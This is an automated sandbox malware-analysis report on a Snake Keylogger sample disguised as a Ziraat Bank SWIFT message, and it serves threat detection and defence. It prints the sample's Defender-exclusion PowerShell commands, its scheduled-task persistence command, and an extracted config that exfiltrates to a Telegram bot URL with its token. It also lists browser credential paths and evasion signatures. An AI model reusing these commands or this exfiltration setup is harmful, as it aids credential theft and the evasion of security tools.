Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Ziraat Bankasi Swift Mesaji.exe

Overview

General Information

Sample name:Ziraat Bankasi Swift Mesaji.exe
Analysis ID:1620239
MD5:fa4883ee6ff76b2325c56b3a09502ac7
SHA1:a56d1515a44a1c2c2275e5249c84d00ce3ee6005
SHA256:373b6c138897ab46738f2a8eedfa6a3d83d5186f4565514e9cd789cddc880062
Tags:exeuser-threatcat_ch
Infos:

Detection

Snake Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected Snake Keylogger
.NET source code contains potential unpacker
Adds a directory exclusion to Windows Defender
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Ziraat Bankasi Swift Mesaji.exe (PID: 5520 cmdline: "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe" MD5: FA4883EE6FF76B2325C56B3A09502AC7)
    • powershell.exe (PID: 1124 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3136 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1048 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 2284 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 2128 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZnbATfUbUgZW" /XML "C:\Users\user\AppData\Local\Temp\tmpE679.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 6096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 5548 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • WerFault.exe (PID: 3160 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 5520 -s 1764 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • ZnbATfUbUgZW.exe (PID: 6396 cmdline: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exe MD5: FA4883EE6FF76B2325C56B3A09502AC7)
    • WerFault.exe (PID: 2780 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6396 -s 1304 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7720744643:AAHCy3Fh8TZOag1r2Dwz3_tabeSbfKIUIZc/sendMessage?chat_id=7053140371", "Token": "7720744643:AAHCy3Fh8TZOag1r2Dwz3_tabeSbfKIUIZc", "Chat_id": "7053140371", "Version": "5.1"}
SourceRuleDescriptionAuthorStrings
00000008.00000002.4521556409.00000000030CB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000000.00000002.2308972090.0000000003F40000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000002.2308972090.0000000003F40000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
        00000000.00000002.2308972090.0000000003F40000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
        • 0x151f7:$a1: get_encryptedPassword
        • 0x35c17:$a1: get_encryptedPassword
        • 0x56437:$a1: get_encryptedPassword
        • 0x154e3:$a2: get_encryptedUsername
        • 0x35f03:$a2: get_encryptedUsername
        • 0x56723:$a2: get_encryptedUsername
        • 0x15003:$a3: get_timePasswordChanged
        • 0x35a23:$a3: get_timePasswordChanged
        • 0x56243:$a3: get_timePasswordChanged
        • 0x150fe:$a4: get_passwordField
        • 0x35b1e:$a4: get_passwordField
        • 0x5633e:$a4: get_passwordField
        • 0x1520d:$a5: set_encryptedPassword
        • 0x35c2d:$a5: set_encryptedPassword
        • 0x5644d:$a5: set_encryptedPassword
        • 0x168a2:$a7: get_logins
        • 0x372c2:$a7: get_logins
        • 0x57ae2:$a7: get_logins
        • 0x16805:$a10: KeyLoggerEventArgs
        • 0x37225:$a10: KeyLoggerEventArgs
        • 0x57a45:$a10: KeyLoggerEventArgs
        00000000.00000002.2308972090.0000000003F40000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_SnakeKeyloggerDetects Snake KeyloggerditekSHen
        • 0x1a15c:$x1: $%SMTPDV$
        • 0x3ab7c:$x1: $%SMTPDV$
        • 0x5b39c:$x1: $%SMTPDV$
        • 0x18b40:$x2: $#TheHashHere%&
        • 0x39560:$x2: $#TheHashHere%&
        • 0x59d80:$x2: $#TheHashHere%&
        • 0x1a104:$x3: %FTPDV$
        • 0x3ab24:$x3: %FTPDV$
        • 0x5b344:$x3: %FTPDV$
        • 0x18ae0:$x4: $%TelegramDv$
        • 0x39500:$x4: $%TelegramDv$
        • 0x59d20:$x4: $%TelegramDv$
        • 0x16470:$x5: KeyLoggerEventArgs
        • 0x16805:$x5: KeyLoggerEventArgs
        • 0x36e90:$x5: KeyLoggerEventArgs
        • 0x37225:$x5: KeyLoggerEventArgs
        • 0x576b0:$x5: KeyLoggerEventArgs
        • 0x57a45:$x5: KeyLoggerEventArgs
        • 0x1a128:$m2: Clipboard Logs ID
        • 0x1a366:$m2: Screenshot Logs ID
        • 0x1a476:$m2: keystroke Logs ID
        Click to see the 15 entries
        SourceRuleDescriptionAuthorStrings
        0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.raw.unpackJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
            0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.raw.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
            • 0x14aff:$a1: get_encryptedPassword
            • 0x3531f:$a1: get_encryptedPassword
            • 0x14deb:$a2: get_encryptedUsername
            • 0x3560b:$a2: get_encryptedUsername
            • 0x1490b:$a3: get_timePasswordChanged
            • 0x3512b:$a3: get_timePasswordChanged
            • 0x14a06:$a4: get_passwordField
            • 0x35226:$a4: get_passwordField
            • 0x14b15:$a5: set_encryptedPassword
            • 0x35335:$a5: set_encryptedPassword
            • 0x161aa:$a7: get_logins
            • 0x369ca:$a7: get_logins
            • 0x1610d:$a10: KeyLoggerEventArgs
            • 0x3692d:$a10: KeyLoggerEventArgs
            • 0x15d78:$a11: KeyLoggerEventArgsEventHandler
            • 0x36598:$a11: KeyLoggerEventArgsEventHandler
            0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.raw.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
            • 0x1c41a:$a2: \Comodo\Dragon\User Data\Default\Login Data
            • 0x3cc3a:$a2: \Comodo\Dragon\User Data\Default\Login Data
            • 0x1b64c:$a3: \Google\Chrome\User Data\Default\Login Data
            • 0x3be6c:$a3: \Google\Chrome\User Data\Default\Login Data
            • 0x1ba7f:$a4: \Orbitum\User Data\Default\Login Data
            • 0x3c29f:$a4: \Orbitum\User Data\Default\Login Data
            • 0x1cabe:$a5: \Kometa\User Data\Default\Login Data
            • 0x3d2de:$a5: \Kometa\User Data\Default\Login Data
            0.2.Ziraat Bankasi Swift Mesaji.exe.3f61118.4.raw.unpackINDICATOR_SUSPICIOUS_EXE_DotNetProcHookDetects executables with potential process hoockingditekSHen
            • 0x156ce:$s1: UnHook
            • 0x35eee:$s1: UnHook
            • 0x156d5:$s2: SetHook
            • 0x35ef5:$s2: SetHook
            • 0x156dd:$s3: CallNextHook
            • 0x35efd:$s3: CallNextHook
            • 0x156ea:$s4: _hook
            • 0x35f0a:$s4: _hook
            Click to see the 25 entries

            System Summary

            barindex
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe", ParentImage: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe, ParentProcessId: 5520, ParentProcessName: Ziraat Bankasi Swift Mesaji.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe", ProcessId: 1124, ProcessName: powershell.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe", ParentImage: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe, ParentProcessId: 5520, ParentProcessName: Ziraat Bankasi Swift Mesaji.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe", ProcessId: 1124, ProcessName: powershell.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZnbATfUbUgZW" /XML "C:\Users\user\AppData\Local\Temp\tmpE679.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZnbATfUbUgZW" /XML "C:\Users\user\AppData\Local\Temp\tmpE679.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe", ParentImage: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe, ParentProcessId: 5520, ParentProcessName: Ziraat Bankasi Swift Mesaji.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZnbATfUbUgZW" /XML "C:\Users\user\AppData\Local\Temp\tmpE679.tmp", ProcessId: 2128, ProcessName: schtasks.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe", ParentImage: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe, ParentProcessId: 5520, ParentProcessName: Ziraat Bankasi Swift Mesaji.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe", ProcessId: 1124, ProcessName: powershell.exe

            Persistence and Installation Behavior

            barindex
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZnbATfUbUgZW" /XML "C:\Users\user\AppData\Local\Temp\tmpE679.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZnbATfUbUgZW" /XML "C:\Users\user\AppData\Local\Temp\tmpE679.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe", ParentImage: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji.exe, ParentProcessId: 5520, ParentProcessName: Ziraat Bankasi Swift Mesaji.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZnbATfUbUgZW" /XML "C:\Users\user\AppData\Local\Temp\tmpE679.tmp", ProcessId: 2128, ProcessName: schtasks.exe
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-20T19:07:21.049407+010028033053Unknown Traffic192.168.2.549706104.21.16.1443TCP
            2025-02-20T19:07:22.404580+010028033053Unknown Traffic192.168.2.549710104.21.16.1443TCP
            2025-02-20T19:07:27.070446+010028033053Unknown Traffic192.168.2.549721104.21.16.1443TCP
            2025-02-20T19:07:28.394620+010028033053Unknown Traffic192.168.2.549724104.21.16.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-02-20T19:07:19.118777+010028032742Potentially Bad Traffic192.168.2.549704132.226.247.7380TCP
            2025-02-20T19:07:20.603180+010028032742Potentially Bad Traffic192.168.2.549704132.226.247.7380TCP
            2025-02-20T19:07:21.884442+010028032742Potentially Bad Traffic192.168.2.549708132.226.247.7380TCP
            2025-02-20T19:07:23.618767+010028032742Potentially Bad Traffic192.168.2.549711132.226.247.7380TCP
            2025-02-20T19:07:24.834114+010028032742Potentially Bad Traffic192.168.2.549717132.226.247.7380TCP
            2025-02-20T19:07:26.446951+010028032742Potentially Bad Traffic192.168.2.549719132.226.247.7380TCP
            2025-02-20T19:07:27.757288+010028032742Potentially Bad Traffic192.168.2.549722132.226.247.7380TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000000.00000002.2308972090.0000000003F40000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7720744643:AAHCy3Fh8TZOag1r2Dwz3_tabeSbfKIUIZc/sendMessage?chat_id=7053140371", "Token": "7720744643:AAHCy3Fh8TZOag1r2Dwz3_tabeSbfKIUIZc", "Chat_id": "7053140371", "Version": "5.1"}
            Source: C:\Users\user\AppData\Roaming\ZnbATfUbUgZW.exeReversingLabs: Detection: 52%
            Source: Ziraat Bankasi Swift Mesaji.exeVirustotal: Detection: 36%Perma Link
            Source: Ziraat Bankasi Swift Mesaji.exeReversingLabs: Detection: 52%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
            Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.unpackString decryptor:
            Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.unpackString decryptor: 7720744643:AAHCy3Fh8TZOag1r2Dwz3_tabeSbfKIUIZc
            Source: 0.2.Ziraat Bankasi Swift Mesaji.exe.3f406f8.3.unpackString decryptor: 7053140371

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Ziraat Bankasi Swift Mesaji.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49705 version: TLS 1.0
            Source: Ziraat Bankasi Swift Mesaji.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: Accessibility.pdbj source: WER6080.tmp.dmp.11.dr
            Source: Binary string: System.Xml.ni.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
            Source: Binary string: XfbOZ.pdb source: Ziraat Bankasi Swift Mesaji.exe, WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr, ZnbATfUbUgZW.exe.0.dr
            Source: Binary string: Accessibility.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
            Source: Binary string: System.ni.pdbRSDS source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
            Source: Binary string: mscorlib.pdbt source: WER6080.tmp.dmp.11.dr
            Source: Binary string: System.Configuration.ni.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
            Source: Binary string: mscorlib.ni.pdbRSDS source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
            Source: Binary string: XfbOZ.pdbSHA256 source: Ziraat Bankasi Swift Mesaji.exe, WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr, ZnbATfUbUgZW.exe.0.dr
            Source: Binary string: System.Configuration.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
            Source: Binary string: System.Xml.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
            Source: Binary string: System.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
            Source: Binary string: System.Xml.ni.pdbRSDS# source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
            Source: Binary string: System.Core.ni.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
            Source: Binary string: Microsoft.VisualBasic.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
            Source: Binary string: System.Windows.Forms.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
            Source: Binary string: mscorlib.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
            Source: Binary string: Accessibility.pdbE source: WER79E4.tmp.dmp.16.dr
            Source: Binary string: System.Drawing.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
            Source: Binary string: mscorlib.ni.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
            Source: Binary string: System.pdb4 source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
            Source: Binary string: System.Core.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
            Source: Binary string: System.Configuration.pdbH source: WER79E4.tmp.dmp.16.dr
            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
            Source: Binary string: System.ni.pdb source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WER79E4.tmp.dmp.16.dr, WER6080.tmp.dmp.11.dr
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0155F1F6h8_2_0155F007
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then jmp 0155FB80h8_2_0155F007
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h8_2_0155E528
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
            Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
            Source: Joe Sandbox ViewIP Address: 132.226.247.73 132.226.247.73
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49711 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49719 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49717 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49708 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49704 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49722 -> 132.226.247.73:80
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49724 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49721 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49710 -> 104.21.16.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49706 -> 104.21.16.1:443
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.5:49705 version: TLS 1.0
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
